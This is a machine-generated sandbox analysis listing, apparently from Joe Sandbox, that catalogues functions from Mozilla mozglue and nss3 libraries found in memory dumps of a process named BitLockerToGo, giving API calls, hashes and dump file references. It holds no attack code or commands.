                                                                                                                                                                                                                                                                                                                    • Instruction ID: d8d0b7fa0fd10382be35d3f472cd50537223075c66ddfc409e2816c0b26b5ad1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a34f92c2ff6f98c87bbfc137142232f2222cf71ca3a43e110b10e4ecafb2777
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE030767006189BCA10EFA8DC448867BACEE4D6B03150525E691C3700D231F905CBA1
                                                                                                                                                                                                                                                                                                                    Function 6C9C85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C9C85D3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C98CA10: malloc.MOZGLUE(?), ref: 6C98CA26
                                                                                                                                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C9C8725
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                                                    • String ID: map/set<T> too long
                                                                                                                                                                                                                                                                                                                    • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 05d40cb6fec76d83108f0ed39942a52dc2d2b3430087c35b1b757bf1a28c273b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f4843c64989f5d5e909302d3e11f6ec5ef6ce76dab0ba23351473d26afaaa32f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05d40cb6fec76d83108f0ed39942a52dc2d2b3430087c35b1b757bf1a28c273b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F45166B4600645CFD705CF28C284A56BBF1BF5A318F19C28AD8595BB52C335E885CF97
                                                                                                                                                                                                                                                                                                                    Function 6CAE4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAE4D57
                                                                                                                                                                                                                                                                                                                    • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CAE4DE6
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ErrorR_snprintf
                                                                                                                                                                                                                                                                                                                    • String ID: %d.%d
                                                                                                                                                                                                                                                                                                                    • API String ID: 2298970422-3954714993
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a00dc45f3256bcfaa01c20661c51ebaadec4080f83db8e4750eaae7da99a7bf0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b1c819a232bf3217272c8b111179b5f4912d4419a6de26a6eb681fe894a0d57
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a00dc45f3256bcfaa01c20661c51ebaadec4080f83db8e4750eaae7da99a7bf0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60310AB2E002586BEB109BA59C45BFF776CEF44308F050469ED159B781EB309949DBE2
                                                                                                                                                                                                                                                                                                                    Function 6C9B3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9B3D19
                                                                                                                                                                                                                                                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C9B3D6C
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                                                                                    • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                                                                                    • Opcode ID: bdcdf4a654b886c5c9a61a944ebb7bfde1955628057c2ebd5ee2bd81b0f10ddf
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a2271f83391c3805bb7cba2ae0bf878566e68d6c6936135fafd217a90764d6d8
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdcdf4a654b886c5c9a61a944ebb7bfde1955628057c2ebd5ee2bd81b0f10ddf
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2111B236E08688E7DB00DB69CC144AEB775FFEA218B459219D859AB702EF30E584C390
                                                                                                                                                                                                                                                                                                                    Function 6C9D6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C9D6E22
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C9D6E3F
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C9D6E1D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                                                                                    • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                                                                                    • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6452dd18ab6e82a6ee480d12290490ec7053b49ca780474b3001a6ea8eccb965
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e259f07353e5044d3d3bb14c73956ab4c572034c519b522b6abe50d176c04477
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6452dd18ab6e82a6ee480d12290490ec7053b49ca780474b3001a6ea8eccb965
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F02471208649CBDB008BA8E990A8933B1536321CF254565C42487B51CF21F52BCBA3
                                                                                                                                                                                                                                                                                                                    Function 6C9CB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C9CB2C9,?,?,?,6C9CB127,?,?,?,?,?,?,?,?,?,6C9CAE52), ref: 6C9CB628
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C90E0: free.MOZGLUE(?,00000000,?,?,6C9CDEDB), ref: 6C9C90FF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C90E0: free.MOZGLUE(?,00000000,?,?,6C9CDEDB), ref: 6C9C9108
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C9CB2C9,?,?,?,6C9CB127,?,?,?,?,?,?,?,?,?,6C9CAE52), ref: 6C9CB67D
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C9CB2C9,?,?,?,6C9CB127,?,?,?,?,?,?,?,?,?,6C9CAE52), ref: 6C9CB708
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C9CB127,?,?,?,?,?,?,?,?), ref: 6C9CB74D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a99cba624aa23e11421a594b2c25a6d6af553322001ab2a11b49aa6651d054e4
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e1a7bd45cb35c8c384f8b03b673c68abc028545a2cc2c2c74ac2e0334a486755
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a99cba624aa23e11421a594b2c25a6d6af553322001ab2a11b49aa6651d054e4
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6251DAB1B05216CBDB14CF18CA8076EB7B9FF84715F158529C85AABB00DB30E814CBA3
                                                                                                                                                                                                                                                                                                                    Function 6C9DB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C980A4D), ref: 6C9DB5EA
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C980A4D), ref: 6C9DB623
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C980A4D), ref: 6C9DB66C
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C980A4D), ref: 6C9DB67F
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: malloc$free
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1480856625-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1ae02e5b6075bfd882737c4352b83267c8f565b3b756450508b129e26bffe89f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 65e63c9bff33695ab28bafec79a174d16df78b0aed50b107d96e46a6680fa990
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ae02e5b6075bfd882737c4352b83267c8f565b3b756450508b129e26bffe89f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F31E571A006168FDF10CF58C84466AB7B9EF80324F5BC569E81AAB201DB31F915CBA0
                                                                                                                                                                                                                                                                                                                    Function 6CAF0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Value$calloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3339632435-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5b5254f9bf48210b4c53eb42b72938b67f366d2fd13be283498988cd9fdc80c8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9bc2893ca29a5acb23947e5a019882039b3da2a321b5d36d6f51ebb07e15a602
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b5254f9bf48210b4c53eb42b72938b67f366d2fd13be283498988cd9fdc80c8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D31C4B16467818FDB106F78D9856697BB4FF0A348F054669E8A887B11EB34D0C6CB82
                                                                                                                                                                                                                                                                                                                    Function 6C9AF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C9AF611
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9AF623
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C9AF652
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9AF668
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7050f7823871ce16d288e1b4da4dd70b5eaf18425d92ba69167319bd2fbbcfdc
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99317171A00214AFCB14CF5DCCC0AAF7BBAFF98358B148538FA498BB04D631E9458B90